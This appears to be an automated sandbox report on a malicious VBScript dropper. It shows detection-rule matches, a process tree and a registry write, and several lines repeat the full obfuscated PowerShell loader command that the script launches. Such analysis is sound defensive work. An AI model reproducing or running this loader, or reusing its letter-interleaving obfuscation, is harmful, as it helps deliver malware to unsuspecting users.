Source: Initial file: semirattlesnake.ShellExecute Angularises, " " & chrw(34) & Eu8 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728
Source: SIEM_PO00938467648.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_8.amsi.csv, type: OTHERMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03265E18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03268F48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: SIEM_PO00938467648.vbsInitial sample: Strings found which are bigger than 50
Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25cruns3.fyd.ps1Jump to behavior
Source: classification engineClassification label: mal100.expl.evad.winVBS@11/9@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: ,l7C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.pdb source: powershell.exe, 00000003.00000002.833248284.00000000053E0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Pedagog\Defibrillationens\Elution", "cQGbcQGbuoYnrofrAswC6wKhHIHChsedPXEBm3EBm4HqEDNKxXEBm3EBm3EBm+sCgfTrTOsC", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Biliate = """LaABrdGedGa-StTDiyCopst", "", "", "0")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_03261059 push eax; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
